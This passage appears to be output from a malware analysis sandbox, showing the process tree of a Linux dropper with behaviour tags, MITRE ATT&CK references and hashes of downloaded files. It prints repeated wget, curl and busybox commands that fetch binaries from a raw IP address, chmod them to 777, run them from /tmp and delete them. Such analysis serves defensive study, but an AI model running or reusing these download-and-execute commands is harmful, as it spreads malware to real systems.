- File and Directory Permissions Modification
PID:1623
-
-
/tmp/13LziPPOU64KElhsy06VSGNerH5jNdigll./13LziPPOU64KElhsy06VSGNerH5jNdigll2⤵
- Executes dropped EXE
- System Network Configuration Discovery
PID:1624
-
-
/bin/rmrm 13LziPPOU64KElhsy06VSGNerH5jNdigll2⤵
- System Network Configuration Discovery
PID:1625
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/0qnht3x6wgBt4VIDkGzRtNIgXNfuERS0PB2⤵
- Writes file to tmp directory
PID:1626
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/0qnht3x6wgBt4VIDkGzRtNIgXNfuERS0PB2⤵
- Writes file to tmp directory
PID:1627
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/0qnht3x6wgBt4VIDkGzRtNIgXNfuERS0PB2⤵
- Writes file to tmp directory
PID:1628
-
-
/bin/chmodchmod 777 0qnht3x6wgBt4VIDkGzRtNIgXNfuERS0PB2⤵
- File and Directory Permissions Modification
PID:1629
-
-
/tmp/0qnht3x6wgBt4VIDkGzRtNIgXNfuERS0PB./0qnht3x6wgBt4VIDkGzRtNIgXNfuERS0PB2⤵
- Executes dropped EXE
PID:1630
-
-
/bin/rmrm 0qnht3x6wgBt4VIDkGzRtNIgXNfuERS0PB2⤵PID:1632
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/Ix6VOWnT9OWWWGOM7Q1453Wi6oDWMuEoTE2⤵PID:1633
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/Ix6VOWnT9OWWWGOM7Q1453Wi6oDWMuEoTE2⤵
- Writes file to tmp directory
PID:1634
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/Ix6VOWnT9OWWWGOM7Q1453Wi6oDWMuEoTE2⤵PID:1635
-
-
/bin/chmodchmod 777 Ix6VOWnT9OWWWGOM7Q1453Wi6oDWMuEoTE2⤵
- File and Directory Permissions Modification
PID:1636
-
-
/tmp/Ix6VOWnT9OWWWGOM7Q1453Wi6oDWMuEoTE./Ix6VOWnT9OWWWGOM7Q1453Wi6oDWMuEoTE2⤵
- Executes dropped EXE
PID:1637
-
-
/bin/rmrm Ix6VOWnT9OWWWGOM7Q1453Wi6oDWMuEoTE2⤵PID:1638
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/EGLz8f6XLVpZXbD6cUw0KPmV7xG50LTVYd2⤵PID:1639
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/EGLz8f6XLVpZXbD6cUw0KPmV7xG50LTVYd2⤵
- Writes file to tmp directory
PID:1640
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/EGLz8f6XLVpZXbD6cUw0KPmV7xG50LTVYd2⤵PID:1641
-
-
/bin/chmodchmod 777 EGLz8f6XLVpZXbD6cUw0KPmV7xG50LTVYd2⤵
- File and Directory Permissions Modification
PID:1642
-
-
/tmp/EGLz8f6XLVpZXbD6cUw0KPmV7xG50LTVYd./EGLz8f6XLVpZXbD6cUw0KPmV7xG50LTVYd2⤵
- Executes dropped EXE
PID:1643
-
-
/bin/rmrm EGLz8f6XLVpZXbD6cUw0KPmV7xG50LTVYd2⤵PID:1644
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/NkgpaOQdTtieFdxuwsluhn2vBIlPYsxcfi2⤵PID:1645
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/NkgpaOQdTtieFdxuwsluhn2vBIlPYsxcfi2⤵
- Writes file to tmp directory
PID:1646
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/NkgpaOQdTtieFdxuwsluhn2vBIlPYsxcfi2⤵PID:1647
-
-
/bin/chmodchmod 777 NkgpaOQdTtieFdxuwsluhn2vBIlPYsxcfi2⤵
- File and Directory Permissions Modification
PID:1648
-
-
/tmp/NkgpaOQdTtieFdxuwsluhn2vBIlPYsxcfi./NkgpaOQdTtieFdxuwsluhn2vBIlPYsxcfi2⤵
- Executes dropped EXE
PID:1649
-
-
/bin/rmrm NkgpaOQdTtieFdxuwsluhn2vBIlPYsxcfi2⤵PID:1650
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/v2saiQIFq9K1TWRSrfvBqfdoJEY362VGsA2⤵PID:1651
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/v2saiQIFq9K1TWRSrfvBqfdoJEY362VGsA2⤵
- Writes file to tmp directory
PID:1652
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/v2saiQIFq9K1TWRSrfvBqfdoJEY362VGsA2⤵PID:1653
-
-
/bin/chmodchmod 777 v2saiQIFq9K1TWRSrfvBqfdoJEY362VGsA2⤵
- File and Directory Permissions Modification
PID:1654
-
-
/tmp/v2saiQIFq9K1TWRSrfvBqfdoJEY362VGsA./v2saiQIFq9K1TWRSrfvBqfdoJEY362VGsA2⤵
- Executes dropped EXE
PID:1655
-
-
/bin/rmrm v2saiQIFq9K1TWRSrfvBqfdoJEY362VGsA2⤵PID:1656
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/xqR6CtJ7I5SA21RGG9xv8mviIbGLeaGEhz2⤵PID:1657
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/xqR6CtJ7I5SA21RGG9xv8mviIbGLeaGEhz2⤵
- Writes file to tmp directory
PID:1658
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/xqR6CtJ7I5SA21RGG9xv8mviIbGLeaGEhz2⤵PID:1659
-
-
/bin/chmodchmod 777 xqR6CtJ7I5SA21RGG9xv8mviIbGLeaGEhz2⤵
- File and Directory Permissions Modification
PID:1660
-
-
/tmp/xqR6CtJ7I5SA21RGG9xv8mviIbGLeaGEhz./xqR6CtJ7I5SA21RGG9xv8mviIbGLeaGEhz2⤵
- Executes dropped EXE
PID:1661
-
-
/bin/rmrm xqR6CtJ7I5SA21RGG9xv8mviIbGLeaGEhz2⤵PID:1662
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/MQ3jCh9hXhhx5ZQVcU2TLN9KA2vZHmSkRU2⤵PID:1663
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/MQ3jCh9hXhhx5ZQVcU2TLN9KA2vZHmSkRU2⤵
- Writes file to tmp directory
PID:1664
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/MQ3jCh9hXhhx5ZQVcU2TLN9KA2vZHmSkRU2⤵PID:1665
-
-
/bin/chmodchmod 777 MQ3jCh9hXhhx5ZQVcU2TLN9KA2vZHmSkRU2⤵
- File and Directory Permissions Modification
PID:1666
-
-
/tmp/MQ3jCh9hXhhx5ZQVcU2TLN9KA2vZHmSkRU./MQ3jCh9hXhhx5ZQVcU2TLN9KA2vZHmSkRU2⤵
- Executes dropped EXE
PID:1667
-
-
/bin/rmrm MQ3jCh9hXhhx5ZQVcU2TLN9KA2vZHmSkRU2⤵PID:1668
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/QLwzp0RthdbRxhlDbVd9BCiEqwJIVs9mY12⤵PID:1669
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/QLwzp0RthdbRxhlDbVd9BCiEqwJIVs9mY12⤵
- Writes file to tmp directory
PID:1670
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/QLwzp0RthdbRxhlDbVd9BCiEqwJIVs9mY12⤵PID:1671
-
-
/bin/chmodchmod 777 QLwzp0RthdbRxhlDbVd9BCiEqwJIVs9mY12⤵
- File and Directory Permissions Modification
PID:1674
-
-
/tmp/QLwzp0RthdbRxhlDbVd9BCiEqwJIVs9mY1./QLwzp0RthdbRxhlDbVd9BCiEqwJIVs9mY12⤵
- Executes dropped EXE
PID:1675
-
-
/bin/rmrm QLwzp0RthdbRxhlDbVd9BCiEqwJIVs9mY12⤵PID:1676
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
141KB
MD53ca8decdb1e52c423c521bfff02ac200
SHA18621ecd6807109b8541912ad9e134f6fb49bfd48
SHA256dee3a1252e88f188c362e08b16ece678559ad2566511871f5cde69296f6c779f
SHA512b6f89d7875d584c109f30814738fec4fe04619745941d9cbbff20bbefbab454dee7180321f6913da1a3b89fba2dc743b28631e52261539d091cc802a5c7a1c7a
-
Filesize
153B
MD5998368d7c95ea4293237f2320546e440
SHA130dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
SHA256533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
SHA512648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97